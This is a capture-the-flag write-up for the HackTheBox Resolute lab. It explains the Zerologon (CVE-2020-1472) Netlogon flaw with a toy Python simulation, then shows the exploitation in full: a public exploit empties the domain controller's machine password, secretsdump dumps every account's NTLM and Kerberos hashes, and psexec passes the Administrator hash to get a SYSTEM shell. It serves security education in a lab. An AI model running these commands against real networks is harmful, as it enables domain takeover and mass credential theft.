CVE-2020-1472


The Zerologon attack lets an unauthenticated attacker escalate straight to Domain Admin; the only requirement is network access to a domain controller's Netlogon (MS-NRPC) RPC interface.

The vulnerability lies in how MS-NRPC uses AES-CFB8 to compute the Netlogon credential: the IV is hard-coded to 16 zero bytes. If the client sends a challenge of 8 zero bytes, then for roughly 1 in 256 session keys the first keystream byte (the first byte of AES(key, zero IV)) is zero, which keeps the CFB8 shift register all-zero and makes the whole 8-byte credential zero as well. The attacker therefore calls NetrServerAuthenticate3 repeatedly with an all-zero client challenge and an all-zero client credential (with the flags that disable signing and sealing). Because the server picks a fresh challenge, and so a fresh session key, on every attempt, a match turns up after about 256 attempts on average, yielding an authenticated Netlogon session as the DC's own machine account. The same weak session key is then used in NetrServerPasswordSet2 with an all-zero 516-byte password buffer, which the DC decrypts to a zero-length password, so the machine account's password in AD becomes the empty string.

More about this vulnerability here.

The target is likely vulnerable: it runs Windows Server 2016 Standard, which is affected unless the August 2020 Netlogon update (and the February 2021 enforcement phase) has been applied. Note that the exploit script used below is not a harmless check; it resets the DC machine account password, so make sure the host is in scope before running it.
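To make the probability argument concrete, here is a toy model of the flawed ComputeNetlogonCredential construction. This is an added example, not code from the original write-up or from the exploit script it uses. AES is replaced by a SHA-256-based block function so the script needs only the standard library (assumption: any good block cipher behaves the same for this argument), the session-key derivation is shaped like the AES variant in MS-NRPC (HMAC-SHA256 over both challenges, with `machine_secret` standing in for the NT hash), and the function names `zerologon` and `empty_password_blob` are mine. The CFB8 structure, the all-zero IV and the all-zero challenge and credential are the real ones.

```python
"""Toy model of the CVE-2020-1472 credential check (added example)."""
import hashlib
import hmac
import random

BLOCK = 16
ZERO_IV = b"\x00" * BLOCK  # MS-NRPC always uses an all-zero IV: this is the bug


def block_encrypt(key: bytes, block: bytes) -> bytes:
    """Stand-in for AES-128 block encryption (assumption: a SHA-256 PRF
    is as good as a real block cipher for the bias shown here)."""
    return hashlib.sha256(key + block).digest()[:BLOCK]


def cfb8_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """CFB8: each plaintext byte is XORed with the first byte of
    E(key, shift_register); the ciphertext byte is then shifted in."""
    sr = bytearray(iv)
    out = bytearray()
    for p in plaintext:
        c = p ^ block_encrypt(key, bytes(sr))[0]
        out.append(c)
        sr = sr[1:] + bytes([c])
    return bytes(out)


def derive_session_key(machine_secret: bytes, client_chal: bytes, server_chal: bytes) -> bytes:
    """Session key derivation shaped like the MS-NRPC AES variant."""
    return hmac.new(machine_secret, client_chal + server_chal, hashlib.sha256).digest()[:BLOCK]


def compute_netlogon_credential(session_key: bytes, challenge: bytes, iv: bytes = ZERO_IV) -> bytes:
    """ComputeNetlogonCredential: CFB8 over the 8-byte challenge."""
    return cfb8_encrypt(session_key, iv, challenge)


def zerologon(machine_secret: bytes, max_attempts: int = 5000, seed: int = 1, zero_iv: bool = True):
    """Replay the attacker's loop: client challenge and client credential
    are both 8 zero bytes; the server draws a fresh challenge (and so a
    fresh session key) per attempt.  Returns (attempt, session_key) on the
    first accepted authentication, else None.  With zero_iv=False the IV
    is derived from the server challenge instead, which removes the bias
    (this is NOT Microsoft's fix, only an illustration of the root cause)."""
    rng = random.Random(seed)
    zero8 = b"\x00" * 8
    for attempt in range(1, max_attempts + 1):
        server_chal = rng.getrandbits(64).to_bytes(8, "big")
        session_key = derive_session_key(machine_secret, zero8, server_chal)
        iv = ZERO_IV if zero_iv else hashlib.sha256(server_chal).digest()[:BLOCK]
        expected = compute_netlogon_credential(session_key, zero8, iv)
        if hmac.compare_digest(expected, zero8):  # server accepts the zero credential
            return attempt, session_key
    return None


def empty_password_blob(session_key: bytes) -> bytes:
    """NetrServerPasswordSet2 encrypts a 516-byte password buffer with the
    same session key and zero IV.  Under a key that passed the check above,
    an all-zero buffer (length field 0 = empty password) encrypts to itself."""
    return cfb8_encrypt(session_key, ZERO_IV, b"\x00" * 516)


if __name__ == "__main__":
    hit = zerologon(b"constructed machine secret")
    if hit:
        attempt, key = hit
        print(f"accepted after {attempt} attempts; first keystream byte = {block_encrypt(key, ZERO_IV)[0]}")
        print("password blob all zero:", empty_password_blob(key) == b"\x00" * 516)
    print("with per-session IV:", zerologon(b"constructed machine secret", zero_iv=False))
```

Run it and the accepted attempt always has a session key whose first keystream byte is zero, which is the only condition the attack needs; expect the hit somewhere in the low hundreds of attempts, and no hit at all in 5000 attempts once the IV depends on the server challenge. Microsoft's actual fix does not change the cipher construction (that would break protocol compatibility); it enforces secure RPC (signing and sealing) for Netlogon, so the attacker can no longer request an unsealed session in the first place.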

Exploit (Zerologon)


I got the exploit script from the GitHub repo

Exploitation


┌──(kali㉿kali)-[~/…/htb/labs/resolute/CVE-2020-1472]
└─$ python3 cve-2020-1472-exploit.py resolute $IP                                                                        
Performing authentication attempts...
===============
Target vulnerable, changing account password to empty string
 
result: 0
 
Exploit complete!

The exploitation is complete, and I never needed any credential, hence the name ZeroLogon. The machine account RESOLUTE$ should now have an empty password in AD. Only the AD-side password changed, though: the DC's locally stored copy of its machine password (the $MACHINE.ACC LSA secret) still holds the old value, so the DC's own Netlogon, replication and Kerberos operations break until the original password is restored. On a real engagement, recover the old hash from the registry-backed secrets and write it back before leaving.

At this point the empty machine-account password gives me the DC's own rights, which include domain replication (DCSync).

Hashdump


┌──(kali㉿kali)-[~/…/htb/labs/resolute/CVE-2020-1472]
└─$ impacket-secretsdump 'megabank.local/resolute$@resolute.megabank.local' -target-ip $IP -dc-ip $IP -no-pass
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:fb3b106896cdaa8a08072775fbd9afe9:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:49a9276d51927d3cd34a8ac69ae39c40:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
megabank.local\ryan:1105:aad3b435b51404eeaad3b435b51404ee:3f653cb103e005246bc95ceb2f56e30b:::
megabank.local\marko:1111:aad3b435b51404eeaad3b435b51404ee:8276510304cefe6e77c3a9e910ba3a6a:::
megabank.local\sunita:6601:aad3b435b51404eeaad3b435b51404ee:4e67de165ebd5e604d6580b15cfc61b2:::
megabank.local\abigail:6602:aad3b435b51404eeaad3b435b51404ee:3f67ccb851b02ac4ee9f91eeddf1cac7:::
megabank.local\marcus:6603:aad3b435b51404eeaad3b435b51404ee:d546df40747f48ece7e2be7349ec8f1b:::
megabank.local\sally:6604:aad3b435b51404eeaad3b435b51404ee:9d5a37664c09e08e8be59ca3e76c262f:::
megabank.local\fred:6605:aad3b435b51404eeaad3b435b51404ee:7be0fca1b4aec94356b86e4b1de06c4f:::
megabank.local\angela:6606:aad3b435b51404eeaad3b435b51404ee:07fe48603fa7ada83e62d14e54f45127:::
megabank.local\felicia:6607:aad3b435b51404eeaad3b435b51404ee:74dce6edc0eabd905d42e0a7225b80f3:::
megabank.local\gustavo:6608:aad3b435b51404eeaad3b435b51404ee:0b03061f9b79bf6642fe92aee0a109c6:::
megabank.local\ulf:6609:aad3b435b51404eeaad3b435b51404ee:f3dfd5c45de7a953c82fbe99749057c2:::
megabank.local\stevie:6610:aad3b435b51404eeaad3b435b51404ee:eb41b7464f302e573aaa697d191b5569:::
megabank.local\claire:6611:aad3b435b51404eeaad3b435b51404ee:72dc9d1d791307cf5217c8e39a88f56a:::
megabank.local\paulo:6612:aad3b435b51404eeaad3b435b51404ee:4e2d8cc79e15e601c099170a645483e6:::
megabank.local\steve:6613:aad3b435b51404eeaad3b435b51404ee:b8de802a1e7862c6e0e19be9c2baff0f:::
megabank.local\annette:6614:aad3b435b51404eeaad3b435b51404ee:2f9b8f25ec94dd46ecb071c27dc82905:::
megabank.local\annika:6615:aad3b435b51404eeaad3b435b51404ee:5d7226ebae151a224ada8add01bdc21c:::
megabank.local\per:6616:aad3b435b51404eeaad3b435b51404ee:b66616eb72209b81edded1fe63ae8806:::
megabank.local\claude:6617:aad3b435b51404eeaad3b435b51404ee:f059af81cb6022dc5de6389d4a6e6a65:::
megabank.local\melanie:10101:aad3b435b51404eeaad3b435b51404ee:e4a22d8e7bbec871b341c88c2e94cba2:::
megabank.local\zach:10102:aad3b435b51404eeaad3b435b51404ee:434927d08ddb971a8b14e407a58f6e9e:::
megabank.local\simon:10103:aad3b435b51404eeaad3b435b51404ee:25bc108c637a551f8b000054ea8ddc6e:::
megabank.local\naoki:10104:aad3b435b51404eeaad3b435b51404ee:07a1070c03b1a26e53d265d27ecb1a38:::
RESOLUTE$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
MS02$:1104:aad3b435b51404eeaad3b435b51404ee:7b71dcfa93cf1f5d37d34497b632c890:::
WIN-2SJZIXAYU6P$:12101:aad3b435b51404eeaad3b435b51404ee:a19e361da6e84cc7a671440bf2fd3500:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:2c729d2a189d5ffdf4792a66eee8e7d37a6e5c37b57a722c307791e7a466f741
Administrator:aes128-cts-hmac-sha1-96:e175930b43cf0835cf361c9cb8d964b1
Administrator:des-cbc-md5:235e4979aeba1073
krbtgt:aes256-cts-hmac-sha1-96:25c34e568e89ccbc1435fbcd4a1067cf23629530d97656923a216b0de82dd333
krbtgt:aes128-cts-hmac-sha1-96:1dff59da1cf4b1c0fadd113dd2400d0b
krbtgt:des-cbc-md5:adcb106701349864
megabank.local\ryan:aes256-cts-hmac-sha1-96:1d5b6f6aaa4841a9b6fc727c114eafaf0b5cae266f2e47a81095cdce2ecc9f7c
megabank.local\ryan:aes128-cts-hmac-sha1-96:67e6a3eec4210a7c0341b72963da4f12
megabank.local\ryan:des-cbc-md5:62c279a8c1c10bd5
megabank.local\marko:aes256-cts-hmac-sha1-96:6ba81690c81b99f828a7d250e432722a95642c63ea201e8a6ba36db50116f6b2
megabank.local\marko:aes128-cts-hmac-sha1-96:7fa0f0b4a72a1ee50c5340ff5f2e7359
megabank.local\marko:des-cbc-md5:46b083b08a79e973
megabank.local\sunita:aes256-cts-hmac-sha1-96:1c31eaa2f2683cce009513f34b58ffcb880910ba9ae2a493a7850e3e1f55208b
megabank.local\sunita:aes128-cts-hmac-sha1-96:b055a012e88ad88a1478e913054d472c
megabank.local\sunita:des-cbc-md5:898ae62a8989832a
megabank.local\abigail:aes256-cts-hmac-sha1-96:a8473d8954d7f3b017561af651e3683eceb8adab27dad0d97a64fe9889c6c600
megabank.local\abigail:aes128-cts-hmac-sha1-96:c1882b7df861cc12bcf86b490793b8e1
megabank.local\abigail:des-cbc-md5:f4388a54e080d610
megabank.local\marcus:aes256-cts-hmac-sha1-96:ed97b881856e9f256976c4317270df2b0c383137f4a2d9289a30a0c8ac9568f0
megabank.local\marcus:aes128-cts-hmac-sha1-96:91e53044de3baa093817db78e7bfc957
megabank.local\marcus:des-cbc-md5:078c4adf98cbb943
megabank.local\sally:aes256-cts-hmac-sha1-96:f3f57f7f0f5ae1de03e946f01f641565a1744deb115e20095e1a48af7341c548
megabank.local\sally:aes128-cts-hmac-sha1-96:3db0cdd0bfa2b9388bfb98885affe537
megabank.local\sally:des-cbc-md5:c4c1f4e9ab98574f
megabank.local\fred:aes256-cts-hmac-sha1-96:f6125e4c00cf1c1c9f93b5f03578eef8edde13f858012caaf500a5f57ea4b1b8
megabank.local\fred:aes128-cts-hmac-sha1-96:6432e8085f207ad837038c6bd30d95b9
megabank.local\fred:des-cbc-md5:31310e1f8c68e907
megabank.local\angela:aes256-cts-hmac-sha1-96:fd77e01c6a2ad42d79d1ab13a8991ec4987d06c5087022983dcee3e288a4319d
megabank.local\angela:aes128-cts-hmac-sha1-96:e8a5bf3aef414ee84b69d0729d8bf055
megabank.local\angela:des-cbc-md5:01f889578c32cb91
megabank.local\felicia:aes256-cts-hmac-sha1-96:d6155ece9141d52abdd40504552296306af3b108034da7170737a2cf5fb6bcb8
megabank.local\felicia:aes128-cts-hmac-sha1-96:20baa9a112699e5d2751af868ab9aefc
megabank.local\felicia:des-cbc-md5:b331a80b3876c470
megabank.local\gustavo:aes256-cts-hmac-sha1-96:4d00b13243910022a07275bd88cd5b6dfca49f82f6b0200b7f990f527bdb482b
megabank.local\gustavo:aes128-cts-hmac-sha1-96:f454326d38c881899f246fa2e711d59f
megabank.local\gustavo:des-cbc-md5:291f1c2a754943ad
megabank.local\ulf:aes256-cts-hmac-sha1-96:e4663bb3849429da167fb460e9c3d15da93c1ce50d24641411500c4bf1b3962c
megabank.local\ulf:aes128-cts-hmac-sha1-96:ebdbf19e8b51bedec2de1babc1154e6f
megabank.local\ulf:des-cbc-md5:fe2ff1da6b6d73fb
megabank.local\stevie:aes256-cts-hmac-sha1-96:f308737f7c792ac1b74f3f6855cad1860b478c8afd906df1b4b14b21d858c5b7
megabank.local\stevie:aes128-cts-hmac-sha1-96:0192b45aa6e143b340b409a377c084f0
megabank.local\stevie:des-cbc-md5:e623166449498c85
megabank.local\claire:aes256-cts-hmac-sha1-96:3a8882538cd36730a38637b23c1ce296946b94a74410568343531dfb623153e2
megabank.local\claire:aes128-cts-hmac-sha1-96:782388d0700da184fe5d978551ae9078
megabank.local\claire:des-cbc-md5:296d944998b63138
megabank.local\paulo:aes256-cts-hmac-sha1-96:0407f0c1a2d50ac27a7f60dff7165aee3ce80f3789b4d1b1bfc3568e477371e2
megabank.local\paulo:aes128-cts-hmac-sha1-96:db3794331a5cac201f9cde86fe959eef
megabank.local\paulo:des-cbc-md5:52b97f7c94808cb3
megabank.local\steve:aes256-cts-hmac-sha1-96:c1eb8da00fe9a4df1e0e85f6eec06a00afa11a19a26116aca04360bf030d379e
megabank.local\steve:aes128-cts-hmac-sha1-96:f6c379343ad9cf7ad17ae5dc339bef87
megabank.local\steve:des-cbc-md5:dcb09780e59dd36b
megabank.local\annette:aes256-cts-hmac-sha1-96:3ef07851ad3a81a2ae88587f6b1268c080d59d3e41e07bd54e97d88d9a1c7541
megabank.local\annette:aes128-cts-hmac-sha1-96:2e238dc190585c1fe68b553f9dfc7738
megabank.local\annette:des-cbc-md5:2a688045d9a868cd
megabank.local\annika:aes256-cts-hmac-sha1-96:43a85bf8df3087cd197cddeb9916887b6cfbedca675f00c3991abb344e894256
megabank.local\annika:aes128-cts-hmac-sha1-96:9bfcad30e8fe505431432b65260f0722
megabank.local\annika:des-cbc-md5:ef468ce946eaf1e5
megabank.local\per:aes256-cts-hmac-sha1-96:7b338c02de23b91a7186fb8eef8a854b17df81cf261ef11a7c2ab6150eb7de52
megabank.local\per:aes128-cts-hmac-sha1-96:bb36d55a17fbb55def6f27a0f6d9f121
megabank.local\per:des-cbc-md5:8919b902678a4f2a
megabank.local\claude:aes256-cts-hmac-sha1-96:99dd9da983f3f1c645d1e4db5097428d6e98a5858a0dc26986a6b16771f81c74
megabank.local\claude:aes128-cts-hmac-sha1-96:bcb9376a3bcb7356700423970f187291
megabank.local\claude:des-cbc-md5:f2dcfe13ea290297
megabank.local\melanie:aes256-cts-hmac-sha1-96:d99fed082814833e7a128f4f82e425ad7e0ef9e30356fe944c1d7391954240dc
megabank.local\melanie:aes128-cts-hmac-sha1-96:7c08d66da82cff1b52ce762bf4bee3bb
megabank.local\melanie:des-cbc-md5:fdb99de3a704fe32
megabank.local\zach:aes256-cts-hmac-sha1-96:4295505ced2fa3a04a0c57ba8824756cb7344c050a23cb1dfe0c96e479c4dda7
megabank.local\zach:aes128-cts-hmac-sha1-96:32fb18cc45a6f6d250f1998e1edf9b91
megabank.local\zach:des-cbc-md5:735b1c37fb68e0a1
megabank.local\simon:aes256-cts-hmac-sha1-96:22c8f32ed5a42a8d09d8a033aaf17d9b6e94454a274e084d1d26c304b8e67260
megabank.local\simon:aes128-cts-hmac-sha1-96:b3936c2e62cb02642c634cf7433e13ed
megabank.local\simon:des-cbc-md5:4c5ef42370026d86
megabank.local\naoki:aes256-cts-hmac-sha1-96:2a3bc7723b6f0190a8d4b101488e2307ca844496a0f086ca9e3667fad5cb23a1
megabank.local\naoki:aes128-cts-hmac-sha1-96:6873a96fdb162feb50a0372333f71ba8
megabank.local\naoki:des-cbc-md5:3292262c7592ea16
RESOLUTE$:aes256-cts-hmac-sha1-96:21945ed8d17ca1968a22564f45a453245b3348baf6d0696cea31d6ccec4bab7b
RESOLUTE$:aes128-cts-hmac-sha1-96:840edc4017d3f2bcfe854976c9ad2026
RESOLUTE$:des-cbc-md5:bc0804e35b3dbf64
MS02$:aes256-cts-hmac-sha1-96:09481277b7203cba30eb72cdfd03384cab3ec47c76b4c9cdd90fd9fd30d09c6b
MS02$:aes128-cts-hmac-sha1-96:dbbad923e27b1099854233b8bfb890ee
MS02$:des-cbc-md5:e6806b490d0b83b3
WIN-2SJZIXAYU6P$:aes256-cts-hmac-sha1-96:9355563837538bf7cb4b8e360f519233c7d3d0879e4bda677b3720c2d4ed5f79
WIN-2SJZIXAYU6P$:aes128-cts-hmac-sha1-96:69eb0fb0ed0c131bb930777b46ebb41c
WIN-2SJZIXAYU6P$:des-cbc-md5:571af23ebcc43dad
[*] Cleaning up... 

Domain Level Compromise

Shelldrop


┌──(kali㉿kali)-[~/…/htb/labs/resolute/CVE-2020-1472]
└─$ impacket-psexec 'megabank.local/administrator@resolute.megabank.local' -hashes aad3b435b51404eeaad3b435b51404ee:fb3b106896cdaa8a08072775fbd9afe9  -target-ip $IP -dc-ip $IP -no-pass 
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[*] Requesting shares on 10.10.10.169.....
[*] Found writable share ADMIN$
[*] Uploading file fHgEPLpx.exe
[*] Opening SVCManager on 10.10.10.169.....
[*] Creating service QDPC on 10.10.10.169.....
[*] Starting service QDPC.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
 
c:\Windows\system32> whoami
nt authority\system
 
c:\Windows\system32> hostname
Resolute
 
c:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 10.10.10.169
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.2
 
Tunnel adapter isatap.{a20a4417-3dc7-47b7-8f00-87cc59d9f43f}:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

System Level Compromise